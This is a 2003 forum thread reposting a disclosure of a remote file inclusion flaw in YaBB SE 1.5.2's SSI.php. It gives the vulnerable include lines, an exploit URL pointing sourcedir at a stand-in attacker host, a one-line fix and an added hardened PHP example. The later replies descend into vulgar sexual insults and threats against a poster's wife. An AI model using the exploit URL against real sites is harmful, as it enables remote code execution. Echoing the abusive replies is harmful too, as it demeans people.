
CourtneyDS
May 18th, 2003, 11:16 PM
Remote code execution in YaBBse 1.5.2 (php version)

======[ Overview
YaBB is a widely used bulletin board system.




======[ Problem
One of the files that is included in the main application is vulnerable
to remote code execution if it is accessed directly with certain
parameters.
The name of the file is SSI.php.
A similar bug was discovered in the previous version, YaBB 1.5.1.


SSI.php:
------------------------------------------
include_once ($sourcedir . '/Errors.php');
include_once ($sourcedir . '/Subs.php');
include_once ($sourcedir . '/Load.php');
------------------------------------------


We can define the $sourcedir variable through the URL and include some other PHP script, local or remote, if remote inclusion is enabled in the php.ini file ...
The bug is not exploitable if PHP's register_globals is set to off ...


======[ Exploit


Exploit would look like this:

http://www.victim.com/yabbse/ssi.php?sourcedir=http://www.attacker.com



Attacker would place an Errors.php file on his server ... The code included would get executed on victim's server ...
Attacker's httpd server should not have php enabled because the
script will be parsed before sending it to the victim ...


======[ Solution


Add this line before include_once() lines mentioned above.



if (!isset($sourcedir)) $sourcedir = "";


======[ Greetz ]======
Greetz goes to hr.hackers and linux .
Special greetz goes to (rand()): BoyScout, h4z4rd, Çòùrtnèy, finis, Sunnis, Fr1c, phreax, StYx, harlequin, LekaMan, Astral and active-security.

** Credit to eLtorO **


Sincerely
CourtneyDS
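
Added example (not part of the original post and not YaBB SE's own code): a hardened version of the include lines quoted from SSI.php, taking the source directory from a server-side constant. The names SOURCE_DIR and source_path() and the location of the Sources directory are assumptions made for illustration.

```php
<?php
// Added example, not YaBB SE code: hardened include prologue for a file
// such as SSI.php.

// Assumption: the board's Sources directory sits beside this file.
// A constant is used instead of $sourcedir because, with register_globals
// on, a request parameter named "sourcedir" is already a set variable when
// the script starts, and a constant cannot be set from the request.
define('SOURCE_DIR', dirname(__FILE__) . '/Sources');

/**
 * Return the absolute path of $file inside SOURCE_DIR, or false when the
 * name is not a bare *.php file name or does not resolve under that directory.
 */
function source_path($file)
{
    // Accept only bare file names such as "Errors.php": no slashes,
    // no scheme, no "..".
    if (!preg_match('/^[A-Za-z0-9_]+\.php$/', $file)) {
        return false;
    }

    // realpath() returns false when the path does not exist.
    $base = realpath(SOURCE_DIR);
    $path = realpath(SOURCE_DIR . '/' . $file);
    if ($base === false || $path === false) {
        return false;
    }

    // After symlinks are resolved the file must still be under the base.
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $path;
}

// The three includes from the post, resolved through the check above.
foreach (array('Errors.php', 'Subs.php', 'Load.php') as $file) {
    $path = source_path($file);
    if ($path === false) {
        header('HTTP/1.1 500 Internal Server Error');
        exit('Missing source file');
    }
    include_once $path;
}
```

The two preconditions the post names can also be closed in php.ini: register_globals = Off, and allow_url_fopen = Off (allow_url_include = Off on PHP 5.2 and later) for remote inclusion.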

Slayer
May 19th, 2003, 01:31 PM
Just out of interest, who the heck is 'eltoro'?

David Lindon
May 19th, 2003, 03:12 PM
Thanks for the warning court.

CourtneyDS
May 19th, 2003, 11:47 PM
rocker_nash
Just out of interest, who the heck is 'eltoro'?

^^ Personally if I were you.. (15 year old high school kid).. pick up a book and learn and don't concern yourself with who is who.. ok little boy ...:

--------------------------------------------------
David :
Thanks for the warning court.


^^ You're more than welcome, David ... PHP is a very weak code as some rate it as the ultimate ... <<>> How can it be rated "Tops" when their entire database can be wiped out in under 12 keystrokes?

Sincerely
CourtneyDS

webcamguy
June 2nd, 2003, 11:59 PM
damn, even i can do it up on yabb and mysql

eyelfixit
June 3rd, 2003, 12:18 AM
Doubt it, there are patches out there and this is extremely old info.

webcamguy
June 3rd, 2003, 12:31 AM
whats she gonna do, tell ya how to do new stuff. damb eyelfixit, ur dumber then you look dude! shut up cuz peeps know you dont know sheout n jus copy n paste to make urself look smart.

eyelfixit
June 3rd, 2003, 12:35 AM
The day you understand that you can't bully me and you're quite beneath me is the day you'll wake up.

All of this is wack including your responses, she gives out old redundant information and you praise her. I think you're the one that needs to learn something.

webcamguy
June 3rd, 2003, 12:39 AM
Originally posted by eyelfixit
The day you understand that you can't bully me and you're quite beneath me is the day you'll wake up.

All of this is wack including your responses, she gives out old redundant information and you praise her. I think you're the one that needs to learn something.

how ya bully n ignorant arse like you, ya laugh at em like peeps at you whenever you post sheoit like you know what ur takin about. n the chick aint gonna post new exploits, ah ha ha ha ha damb ur dumb eyelfixit

eyelfixit
June 3rd, 2003, 12:42 AM
Can you speak English, cause I really can't follow your "slang".

What you're saying doesn't make any sense, again!

webcamguy
June 3rd, 2003, 01:04 AM
Originally posted by eyelfixit
Can you speak English, cause I really can't follow your "slang".

What you're saying doesn't make any sense, again!

yo, we dont all have spell checkers like you dude. i read some of ur other posts n you cant spell. whats up man, search engine down n you can be important. ah ha ha ha ha
ur a fukin joke bro! go get urself a girl cuz you dont know nothin n it shows!

eyelfixit
June 3rd, 2003, 01:08 AM
Sorry bud, but this is pretty weak again, I do have a beautiful wife and 2 kids.

And as far as I know all top search engines are up.

LOL :)

webcamguy
June 3rd, 2003, 01:13 AM
Originally posted by eyelfixit
Sorry bud, but this is pretty weak again, I do have a beautiful wife and 2 kids.

And as far as I know all top search engines are up.

LOL :)

damb, i hope they aint as dumb n retarded on the computer as you bro! if so man, ur some sad arse peeps up there in bc!
yo man does she give good head!

eyelfixit
June 3rd, 2003, 01:30 AM
lol, god you crack me up, you remind me of someone I know.

webcamguy
June 3rd, 2003, 01:37 AM
Originally posted by eyelfixit
lol, god you crack me up, you remind me of someone I know.

yo man thats good bro, jus tell ur slut arse wife to swallow next time or shes gonna get fuked up! yo man im gonna piss on her like the worthless tramp she is! slut wife and a retarded husband!

eyelfixit
June 3rd, 2003, 02:05 AM
Do you honestly think that a hater can get the best of me?

Try again. :)

Spud
June 21st, 2003, 10:59 PM
Just out of interest, who the hell is 'eltoro'?
(electron)

I think he was one of the 1st known hackers,
and he is also Australian,
but I also didn't read much of this thread so I could be off subject?